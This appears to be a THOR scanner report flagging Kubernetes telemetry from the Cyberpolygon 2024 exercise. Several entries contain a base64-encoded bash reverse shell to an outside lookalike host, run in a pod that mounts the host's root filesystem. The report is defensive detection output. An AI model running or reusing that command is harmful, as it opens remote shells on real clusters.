Errors

Alerts

Warnings

Warning 1
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.

Warning 2
Sep 10 18:36:35 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.

Warning 3
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"AoI_uJEBNKI3r7qcaSwz","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:21.961Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"191ab5a2-2575-4009-a93f-b458ac958b3e\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...],\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 4
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"34I_uJEBNKI3r7qckC81","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:35.965Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"e19bb517-20b7-4c99-8e9f-3daa35b7a341\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"container[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\":{},\"f:args\":{},\"f:image\":{},\"f:imagePullPolicy\":{},\"f:name\":{},\"f:resources\":{},\"f:securityContext\":{\".\":{},\"f:runAsUser\":{}},\"f:terminationMessagePath\":{},\"f:terminationMessagePolicy\":{},\"f:volumeMounts\":{\".\":{},\"k:{\\\"mountPath\\\":\\\"/host\\\"}\":{\".\":{},\"f:mountPath\":{},\"f:name\":{}}}}},\
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 5
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"U4I_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3\", \"pid\":166517, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/bash\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.426919025Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":9}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"tid\":166517}, \"pa[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]/fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":9,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTY4NTQ4NTY6MTY2NTE3"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":166480,"cwd":"/home/utils","start_t
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 6
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"VoI_uJEBNKI3r7qc3jxh","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTU5MTYyOTA6MTY2NDgw\", \"pid\":166480, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.425980113Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2\", \"tid\":166480}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2N[...]4.118.57"]},"tags":["beats_input_codec_plain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:48.425980320Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":166480,"cwd":"/home/utils","start_time":"2024-09-03T14:17:48.425980113Z","docker":"fdcd66e90be354011d42578ba2f1fd0","parent_exec_id":"azhzLW5vZGUwMTo5NzA4OTk4ODcyMjIxNTE6MTY2NDY2","tid":166480,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","c
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 7
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"wYI_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:50.154Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2\", \"pid\":166516, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/usr/bin/base64\", \"arguments\":\"-d\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:48.428681947Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"start_time\":\"2024-09-03T14:17:48Z\", \"pid\":8}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"fdcd66e90be354011d42578ba2f1fd0\", \"parent_exec_id\":\"azhzLW5vZGU[...]:\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\"[...]bin/base64","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://fdcd66e90be354011d42578ba2f1fd05285c5487627321edd9f5737da5bc669e","name":"mlops-metrics","start_time":"2024-09-03T14:17:48Z","pid":8,"image":{"id":"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550","name":"docker.io/arunvelsriram/utils:latest"}},"namespace":"prod","workload":"mlops-metrics"},"exec_id":"azhzLW5vZGUwMTo5NzA4OTk5NTg2MTc2NzU6MTY2NTE2"},"parent":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 
'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 8
Sep 10 18:39:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"y4I_uJEBNKI3r7qc3jxk","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:49.971Z","type":"k8s","event":{"original":"{\"kind\":\"Event\",\"apiVersion\":\"audit.k8s.io/v1\",\"level\":\"RequestResponse\",\"auditID\":\"1a825c2c-71a2-45df-a947-32d1c33d6f9f\",\"stage\":\"ResponseComplete\",\"requestURI\":\"/api/v1/namespaces/prod/pods/mlops-metrics/status\",\"verb\":\"patch\",\"user\":{\"username\":\"system:node:k8s-node01\",\"groups\":[\"system:nodes\",\"system:authenticated\"]},\"sourceIPs\":[\"10.24.118.57\"],\"userAgent\":\"kubelet/v1.29.8 (linux/amd64) kubernetes/234bc63\",\"objectRef\":{\"resource\":\"pods\",\"namespace\":\"prod\",\"name\":\"mlops-metrics\",\"apiVersion\":\"v1\",\"subresource\":\"status\"},\"responseStatus\":{\"metadata\":{},\"code\":200},\"requestObject\":{\"metadata\":{\"uid\":\"1ab33031-f4eb-47a9-a8ab-af27c89bacbb\"},\"status\":{\"$setEleme[...]"args\\\":[\\\"sh\\\",\\\"-c\\\",\\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\\\"],\\\"image\\\":\\\"arunvelsriram/utils\\\",\\[...]th\\\":\\\"/host\\\",\\\"name\\\":\\\"hostvolume\\\"}]}],\\\"volumes\\\":[{\\\"hostPath\\\":{\\\"path\\\":\\\"/\\\",\\\"type\\\":\\\"Directory\\\"},\\\"name\\\":\\\"hostvolume\\\"}]}}\\n\"},\"managedFields\":[{\"manager\":\"calico\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\"f:cni.projectcalico.org/containerID\":{},\"f:cni.projectcalico.org/podIP\":{},\"f:cni.projectcalico.org/podIPs\":{}}}},\"subresource\":\"status\"},{\"manager\":\"kubectl-client-side-apply\",\"operation\":\"Update\",\"apiVersion\":\"v1\",\"time\":\"2024-09-03T14:16:48Z\",\"fieldsType\":\"FieldsV1\",\"fieldsV1\":{\"f:metadata\":{\"f:annotations\":{\".\":{},\"f:kubectl.kubernetes.io/last-applied-configuration\":{}},\"f:labels\":{\".\":{},\"f:app\":{}}},\"f:spec\":{\"f:containers\":{\"k:{\\\"name\\\":\\\"mlops-metrics\\\"}\":{\".\"
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-03-25
TAGS_1:
LINUX, OBFUS, SCRIPT, SUSP, T1027, T1059_004, T1070_003, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Base64_Encoded_Bash_RevShell_Pattern_Mar22_1 / Detects suspicious base64 encoded bash reverse shell patterns
SUBSCORE_2:
70
REF_2:
Internal Research
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2022-03-01
TAGS_2:
SCRIPT, SUSP, T1059_004, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
FILE_1:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
3849046354
FIRSTBYTES_1:
7b225f696e646578223a226379626572706f6c79 / {"_index":"cyberpoly
CREATED_1:
Tue Sep 10 09:09:01.408 2024
OWNER_1:
BUILTIN\Administrators

Warning 9
Sep 10 18:39:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
{"_index":"cyberpolygon2024-mercurylark-k8s","_id":"x4I_uJEBNKI3r7qcaSsw","_score":1,"_source":{"@timestamp":"2024-09-03T14:17:22.150Z","type":"k8s","event":{"original":"{\"process_exec\":{\"process\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE5MzIxNDUwMDY6MTY0NzYw\", \"pid\":164760, \"uid\":0, \"cwd\":\"/home/utils\", \"binary\":\"/bin/sh\", \"arguments\":\"-c \\\"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\\\"\", \"flags\":\"execve clone\", \"start_time\":\"2024-09-03T14:17:20.402209123Z\", \"auid\":4294967295, \"pod\":{\"namespace\":\"prod\", \"name\":\"mlops-metrics\", \"container\":{\"id\":\"cri-o://11c3efd882aa61732eccba3bdd9d6db3cc4128c22036953fd9609d43620c277b\", \"name\":\"mlops-metrics\", \"image\":{\"id\":\"docker.io/arunvelsriram/utils@sha256:4d9e72a00b0c961c78d2392f2da7700c3c34e2181295833130ff4fbc7512a550\", \"name\":\"docker.io/arunvelsriram/utils:latest\"}, \"pid\":1}, \"pod_labels\":{\"app\":\"mlops-metrics\"}, \"workload\":\"mlops-metrics\", \"workload_kind\":\"Pod\"}, \"docker\":\"11c3efd882aa61732eccba3bdd9d6db\", \"parent_exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"tid\":164760}, \"parent\":{\"exec_id\":\"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2\", \"pid\":164746, \"uid\":0, \"cwd\"[...]ain_applied"],"input":{},"k8s":{"runtime":{"node_name":"k8s-node01","time":"2024-09-03T14:17:20.402208808Z","process_exec":{"process":{"arguments":"-c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | /bin/bash\"","flags":"execve clone","auid":4294967295,"commandline":"/bin/sh -c \"echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwL2h1Z2xuZ2ZhY2UuY29tLzExMzcyIDA+JjE=' | base64 -d | 
/bin/bash\"","pid":164760,"cwd":"/home/utils","start_time":"2024-09-03T14:17:20.402209123Z","docker":"11c3efd882aa61732eccba3bdd9d6db","parent_exec_id":"azhzLW5vZGUwMTo5NzA4NzE4NzUyMzc1MDc6MTY0NzQ2","tid":164760,"uid":0,"binary":"/bin/sh","pod":{"name":"mlops-metrics","workload_kind":"Pod","container":{"id":"cri-o://11c3efd882aa6173
SCORE:
88
FILE:
D:\CYBERPOLYGON\artefacts\telemetry cyberpolygon 2024\k8s\data\cyberpolygon2024-mercurylark-k8s.json
LOG_MODIFIED:
Fri Sep 6 17:24:04 2024
LOG_ACCESSED:
Tue Sep 10 09:09:49 2024
LOG_CREATED:
Tue Sep 10 09:09:01 2024
REASON_1:
YARA rule SUSP_LNX_OBFUSC_Base64_Encoded_Bash_Commands_Mar23_1 / Detects suspicious base64 bash commands often found in hack tools
SUBSCORE_1:
75
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
